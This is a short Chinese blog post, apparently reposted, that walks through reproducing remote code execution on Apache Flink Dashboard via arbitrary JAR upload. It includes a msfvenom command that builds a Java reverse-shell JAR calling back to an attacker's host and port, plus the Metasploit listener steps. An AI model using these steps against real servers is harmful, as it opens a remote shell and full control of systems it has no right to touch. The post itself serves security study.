Apache Flink Dashboard 任意jar包上传 Rce复现


0X01.漏洞原理

攻击者可利用该漏洞在 Apache Flink Dashboard页面中上传任意Jar包,利用Metasploit在Apache Flink服务器中执行任意代码,获取服务器最高权限,所以危害性较大。

0X02.漏洞复现

需要生成一个公网的IP地址exploit才能正常接收到msf反射的shell通道。使用端口转发工具在内网与公网之间形成映射

有了公网IP,现在可以用这个POC生成Jar包

msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar

上传jar包后,在msfexploit中Set LHOST,SET PORT后,点击submit

成功监听。执行任意LINUX命令

POC中的Lhost,LPort 为公网IP与端口。

MsfExploit中的Lhost Lport为Localhost和与公网端口有映射关系的的本地监听端口。

0X03.一些问题

1.使用NC监听失败,原因未知,msfexploit正常
2.下次尝试使用端口转发工具反弹shell


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM